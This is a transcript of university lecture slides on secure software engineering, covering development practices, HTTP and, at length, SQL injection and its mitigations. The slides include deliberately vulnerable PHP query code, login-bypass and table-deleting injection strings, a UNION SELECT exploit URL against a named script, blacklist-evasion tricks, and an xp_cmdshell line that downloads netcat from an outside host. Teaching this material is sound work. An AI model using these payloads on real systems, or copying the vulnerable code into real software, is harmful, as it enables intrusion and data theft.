Presentation is loading. Please wait.

Presentation is loading. Please wait.

Secure Software Engineering James Walden Northern Kentucky University.

Published by Modified over 9 years ago

Similar presentations

Presentation on theme: "Secure Software Engineering James Walden Northern Kentucky University."— Presentation transcript:

1 Secure Software Engineering James Walden Northern Kentucky University

2 CSC 666: Secure Software Engineering Course Information Prerequisites CSC 540, CSC 582 Web Site http://faculty.cs.nku.edu/~waldenj/classes/2009/spring/csc666/ Textbooks Software Security, Gary McGraw, Addison- Wesley, 2006. Secure Programming with Static Analysis, Brian Chess and Jacob West, Addison-Wesley, 2007.

3 CSC 666: Secure Software Engineering Assignment Policy Available on web page. Your responsibility to check for announcements. Types of assignments Individual programming/assessment assignments. Group programming/assessment assignments. Late policy 20% penalty up to one week late 0 points given after one week late

4 CSC 666: Secure Software Engineering Topics 1.The Software Security Problem 2.Processes and Touchpoints 3.Web Application Vulnerabilities 4.An Example Bug: SQL Injection

5 CSC 666: Secure Software Engineering Traditional Security is Reactive  Perimeter defense (firewalls)  Intrusion detection  Over-reliance on cryptography  Penetrate and patch  Penetration testing

6 CSC 666: Secure Software Engineering The Problem is Software “75% of hacks happen at the application.” - Theresa Lanowitz, Gartner Inc. “92% of reported vulnerabilities are in apps, not networks.” - NIST “64% of developers are not confident in their ability to write secure code.” - Bill Gates

7 CSC 666: Secure Software Engineering A Growing Problem

8 CSC 666: Secure Software Engineering Motivations

9 CSC 666: Secure Software Engineering Trinity of Trouble Connectivity  Ubquitious Internet; wireless & mobile computing. Complexity  Networked, distributed code that can interact with intermediate caches, ad proxies, etc. Extensibility  Systems evolve in unexpected ways, e.g. web browsers, which support many formats, add- ons, plugins, programming languages, etc.

10 CSC 666: Secure Software Engineering SSE Objectives 1. Dependability: software functions only as intended; 2.Trustworthiness: No exploitable vulnerabilities or malicious logic exist in the software; 3. Resilience: If compromised, damage will be minimized, and it will recover quickly to an acceptable level of operating capacity; 4. Conformance: to requirements and applicable standards and procedures.

11 CSC 666: Secure Software Engineering Security Standards and Certs  ISO 15408 Common Criteria  PCI Data Security Standard  Requirement 6: Develop and maintain secure systems and applications  SANS GIAC Secure Software Programmer  http://www.sans-ssi.org/ http://www.sans-ssi.org/  Many standards indirectly impact SSE  FISMA  SOX

12 CSC 666: Secure Software Engineering Secure Development Processes  CLASP (Comprehensive, Lightweight Application Security Process)  Correctness-by-Construction (formal methods based process from Praxis Critical Systems)  MS SDL (Microsoft Secure Development Lifecycle)  SSE CMM (Secure Software Engineering Capability Maturity Model)  TSP-Secure (Team Software Process for Secure Software Development)  Touchpoints

13 CSC 666: Secure Software Engineering Software Security Practices 1.Code Reviews 2.Risk Analysis 3.Penetration Testing Security Operations RequirementsDesignCodingTestingMaintenance Risk Analysis Abuse Cases Code Reviews + Static Analysis Penetration Testing Security Testing 4.Security Testing 5.Abuse Cases 6.Security Operations

14 CSC 666: Secure Software Engineering Code Reviews Fix implementation bugs, not design flaws. Benefits of code reviews 1.Find defects sooner in the lifecycle. 2.Find defects with less effort than testing. 3.Find different defects than testing. 4.Educate developers about security flaws.

15 CSC 666: Secure Software Engineering Architectural Risk Analysis Fix design flaws, not implementation bugs. Risk analysis steps 1.Develop an architecture model. 2.Identify threats and possible vulnerabilities. 3.Develop attack scenarios. 4.Rank risks based on probability and impact. 5.Develop mitigation strategy. 6.Report findings

16 CSC 666: Secure Software Engineering Penetration Testing Test software in deployed environment. Allocate time at end of development to test. Often time-boxed: test for n days. Schedule slips often reduce testing time. Fixing flaws is expensive late in lifecycle. Penetration testing tools Test common vulnerability types against inputs. Fuzzing: send random data to inputs. Don’t understand application structure or purpose.

17 CSC 666: Secure Software Engineering Security Testing Intendended Functionality Actual Functionality Functional testing will find missing functionality. Injection flaws, buffer overflows, XSS, etc.

18 CSC 666: Secure Software Engineering Security Testing Two types of testing Functional: verify security mechanisms. Adversarial: verify resistance to attacks generated during risk analysis. Different from traditional penetration testing White box. Use risk analysis to build tests. Measure security against risk model.

19 CSC 666: Secure Software Engineering Abuse Cases Anti-requirements Think about what software should not do. A use case from an adversary’s point of view. Obtain Another User’s CC Data. Alter Item Price. Deny Service to Application. Developing abuse cases Informed brainstorming: attack patterns, risks.

20 CSC 666: Secure Software Engineering Security Operations User security notes Software should be secure by default. Enabling certain features may have risks. User needs to be informed of security risks. Incident response What happens when a vulnerability is reported? How do you communicate with users? How do you send updates to users?

21 CSC 666: Secure Software Engineering Web Application Vulnerabilities Input-based Security Problems  Injection Flaws  Insecure Remote File Inclusion  Unvalidated Input Authentication and Authorization  Authentication  Access Control  Cross-Site Scripting Other Bugs  Error Handling and Information Leakage  Insecure Storage  Insecure Communications

22 CSC 666: Secure Software Engineering HTTP: HyperText Transfer Protocol Simple request/response protocol  Request methods: GET, POST, HEAD, etc.  Stateless: req#2 doesn’t know about req#1 HTTPS  HTTP wrapped in SSL/TLS encryption  Protects data in transit to web server.  Doesn’t protect stored data.  Doesn’t protect server from being hacked.

23 CSC 666: Secure Software Engineering HTTP Request GET http://www.google.com/ HTTP/1.1 Host: www.google.com User-Agent: Mozilla/5.0 (Windows NT 5.1) Gecko/20060909 Firefox/1.5.0.7 Accept: text/html, image/png, */* Accept-Language: en-us,en;q=0.5 Cookie: rememberme=true; PREF=ID=21039ab4bbc49153:FF=4 MethodURL Protocol Version Headers Blank Line No Data for GET

24 CSC 666: Secure Software Engineering HTTP Response HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Server: GWS/2.1 Date: Fri, 13 Oct 2006 03:16:30 GMT... (page data)... Protocol VersionHTTP Response Code Headers Blank Line Web Page Data

25 CSC 666: Secure Software Engineering HTTP GET Parameters http://ex.com/path/app.cgi?param1=val1&param2=val2 Format  parameter_name=value  Multiple parameters separated by & URI encoding  Encode chars as ISO-Latin hex val: %XY  Special characters must be encoded.  Any character may be encoded.

26 CSC 666: Secure Software Engineering HTTP POST Parameters POST /path/app.cgi HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-Length: 32 param1=value1&param2=value2 Format  parameter_name=value  Multiple parameters separated by & URI encoding

27 CSC 666: Secure Software Engineering Cookies HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: Name=Value; path=/; expires=01-Jan-2038 23:59:59UCT Cookie Format  Only sent to URLs that match path, domain.  Sent only via SSL if secure specified.  Expires on date or when browser closed. GET /path/app.cgi HTTP/1.1 Host: ex.com Cookie: Name=Value

28 CSC 666: Secure Software Engineering An Example Bug: Injection  Injection attacks trick an application into including unintended commands in the data send to an interpreter.  Interpreters  Interpret strings as commands.  Ex: SQL, shell (cmd.exe, bash), LDAP, XPath  Key Idea  Input data from the application is executed as code by the interpreter.

29 CSC 666: Secure Software Engineering SQL Injection 1.App sends form to user. 2.Attacker submits form with SQL exploit data. 3.Application builds string with exploit data. 4.Application sends SQL query to DB. 5.DB executes query, including exploit, sends data back to application. 6.Application returns data to user. Attacker Web Server DB Server Firewall User Pass ‘ or 1=1--

30 CSC 666: Secure Software Engineering SQL Injection in PHP $link = mysql_connect($DB_HOST, $DB_USERNAME, $DB_PASSWORD) or die ("Couldn't connect: ". mysql_error()); mysql_select_db($DB_DATABASE); $query = "select count(*) from users where username = '$username' and password = '$password'"; $result = mysql_query($query);

31 CSC 666: Secure Software Engineering SQL Injection Attack #1 Unauthorized Access Attempt: password = ’ or 1=1 -- SQL statement becomes: select count(*) from users where username = ‘user’ and password = ‘’ or 1=1 -- Checks if password is empty OR 1=1, which is always true, permitting access.

32 CSC 666: Secure Software Engineering SQL Injection Attack #2 Database Modification Attack: password = foo’; delete from table users where username like ‘% DB executes two SQL statements: select count(*) from users where username = ‘user’ and password = ‘foo’ delete from table users where username like ‘%’

33 CSC 666: Secure Software Engineering Finding SQL Injection Bugs 1.Submit a single quote as input. If an error results, app is vulnerable. If no error, check for any output changes. 2.Submit two single quotes. Databases use ’’ to represent literal ’ If error disappears, app is vulnerable. 3.Try string or numeric operators. Oracle: ’||’FOO MS-SQL: ‘+’FOO MySQL: ’ ’FOO 2-2 81+19 49-ASCII(1)

34 CSC 666: Secure Software Engineering 2008 Mass SQL Injection Attacks  Estimated 1.5 million pages compromised.  Methodology  Identify vulnerable web applications.  Use xp_cmdshell on MS SQL to download tools to compromised MS SQL server.  Use fgdump to obtain Windows credentials.  Install backdoors that periodically contact their command & control servers.  Search for credit cards or brute force passwords.

35 CSC 666: Secure Software Engineering Real Estate Site Hacking www.website.com/fullnews.php?id=- 1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username, char(58),password),4,5/**/FROM/**/admin/* Exploit against http://phprealestatescript.com/

36 CSC 666: Secure Software Engineering The Problem: String Building Building a SQL command string with user input in any language is dangerous. Variable interpolation. String concatenation with variables. String format functions like sprintf(). String templating with variable replacement.

37 CSC 666: Secure Software Engineering Mitigating SQL Injection Partially Effective Mitigations Blacklists Stored Procedures Effective Mitigations Whitelists Prepared Queries

38 CSC 666: Secure Software Engineering Ineffective Mitigation: Blacklist Filter out known bad SQL metacharacters, such as single quotes. Problems: 1.Numeric parameters don’t use quotes. 2.URL escaped metacharacters. 3.Unicode encoded metacharacters. 4.Did you miss any metacharacters?

39 CSC 666: Secure Software Engineering Bypassing Blacklist Filters Different case SeLecT instead of SELECT or select Bypass keyword removal filters SELSELECTECT URL-encoding %53%45%4C%45%43%54 SQL comments SELECT/*foo*/num/*foo*/FROM/**/cc SEL/*foo*/ECT String Building ‘us’||’er’ chr(117)||chr(115)||chr(101)||chr(114)

40 CSC 666: Secure Software Engineering Ineffective Mitigation: Stored Procedures SQL Stored Procedures build strings too: CREATE PROCEDURE dbo.doQuery(@id nchar(128) AS DECLARE @query nchar(256) SELECT @query = ‘SELECT cc FROM cust WHERE id=‘’’ + @id + ‘’’’ EXEC @query RETURN and they can be invoked insecurely with user input: exec sp_login ‘user’ ‘foo’; master..xp_cmdshell ‘tftp e.com GET nc.exe’#

41 CSC 666: Secure Software Engineering Mitigation: Whitelist Reject input that doesn’t match your list of safe characters to accept.  Identify what’s good, not what’s bad.  Reject input instead of attempting to repair.  Still have to deal with single quotes when required, such as in names.

42 CSC 666: Secure Software Engineering Mitigation: Prepared Queries require_once 'MDB2.php'; $mdb2 =& MDB2::factory($dsn, $options); if (PEAR::isError($mdb2)) { die($mdb2->getMessage()); } $sql = “SELECT count(*) from users where username = ? and password = ?”; $types = array('text', 'text'); $sth = $mdb2->prepare($sql, $types, MDB2_PREPARE_MANIP); $data = array($username, $password); $sth->execute($data);

43 CSC 666: Secure Software Engineering Key Points  The Problem of Software Security  SSE Goals  Dependability  Trustworthiness  Resilience  Conformance  Touchpoints  Code Reviews  Risk Analysis  Penetration Testing  Security Testing  Abuse Cases  Security Operations

44 CSC 666: Secure Software Engineering References 1.Brian Chess and Jacob West, Secure Programming with Static Analysis, Addison-Wesley, 2007. 2.CLASP, OWASP CLASP Project, http://www.owasp.org/index.php/Category:OWASP_CLASP_Proje ct, 2008. http://www.owasp.org/index.php/Category:OWASP_CLASP_Proje ct 3.Noopur Davis et. al., Processes for Producing Secure Software. IEEE Security & Privacy, May 2004. 4.Karen Goertzel, Theodore Winograd, et al. for Department of Homeland Security and Department of Defense Data and Analysis Center for Software. Enhancing the Development Life Cycle to Produce Secure Software: A Reference Guidebook on Software Assurance, October 2008.Enhancing the Development Life Cycle to Produce Secure Software 5.Michael Howard and Steve Lipner, The Security Development Lifecycle, Microsoft Press, 2006. 6.Michael Howard, “SAFECode: Fundamental Processes for Secure Software Development,” http://www.safecode.org/publications/SAFECode_Dev_Practices1 008.pdf, October 2008. http://www.safecode.org/publications/SAFECode_Dev_Practices1 008.pdf 7.Gary McGraw, Software Security, Addison-Wesley, 2006.

Download ppt "Secure Software Engineering James Walden Northern Kentucky University."

Similar presentations

August 1, 2006 Software Security. August 1, 2006 Essential Facts Software Security != Security Features –Cryptography will not make you secure. –Application.

August 1, 2006 Software Security. August 1, 2006 Essential Facts Software Security != Security Features –Cryptography will not make you secure. –Application.
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
James Walden, Maureen Doyle Northern Kentucky University Students: Andrew Plunkett, Rob Lenhof, John Murray.

James Walden, Maureen Doyle Northern Kentucky University Students: Andrew Plunkett, Rob Lenhof, John Murray.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
HTTP Hypertext Transfer Protocol. HTTP messages HTTP is the language that web clients and web servers use to talk to each other –HTTP is largely “under.

HTTP Hypertext Transfer Protocol. HTTP messages HTTP is the language that web clients and web servers use to talk to each other –HTTP is largely “under.
The World Wide Web and the Internet Dr Jim Briggs 1WUCM1.

The World Wide Web and the Internet Dr Jim Briggs 1WUCM1.
Dec 13 th CS555 presentation1 Yiwen Wang --“Securing the DB may be the single biggest action an organization can take to protect its assets” David C. Knox.

Dec 13 th CS555 presentation1 Yiwen Wang --“Securing the DB may be the single biggest action an organization can take to protect its assets” David C. Knox.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 

Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
SEC835 Database and Web application security Information Security Architecture.

SEC835 Database and Web application security Information Security Architecture.
Web Hacking 1. Overview Why web HTTP Protocol HTTP Attacks 2.

Web Hacking 1. Overview Why web HTTP Protocol HTTP Attacks 2.
MIS 5211.001 Week 11 Site:

MIS Week 11 Site:
HTTP and Server Security James Walden Northern Kentucky University.

HTTP and Server Security James Walden Northern Kentucky University.
Principles of Computer Security: CompTIA Security + ® and Beyond, Third Edition © 2012 Principles of Computer Security: CompTIA Security+ ® and Beyond,

Principles of Computer Security: CompTIA Security + ® and Beyond, Third Edition © 2012 Principles of Computer Security: CompTIA Security+ ® and Beyond,
CSCI 6962: Server-side Design and Programming Secure Web Programming.

CSCI 6962: Server-side Design and Programming Secure Web Programming.
Web Application Access to Databases. Logistics Test 2: May 1 st (24 hours) Extra office hours: Friday 2:30 – 4:00 pm Tuesday May 5 th – you can review.

Web Application Access to Databases. Logistics Test 2: May 1 st (24 hours) Extra office hours: Friday 2:30 – 4:00 pm Tuesday May 5 th – you can review.
Ladd Van Tol Senior Software Engineer Security on the Web Part One - Vulnerabilities.

Ladd Van Tol Senior Software Engineer Security on the Web Part One - Vulnerabilities.
March 4, 2008 ISACA Web Application Security James Walden Northern Kentucky University

March 4, 2008 ISACA Web Application Security James Walden Northern Kentucky University
Penetration Testing James Walden Northern Kentucky University.

Penetration Testing James Walden Northern Kentucky University.
A Security Review Process for Existing Software Applications

A Security Review Process for Existing Software Applications

Similar presentations

Ads by Google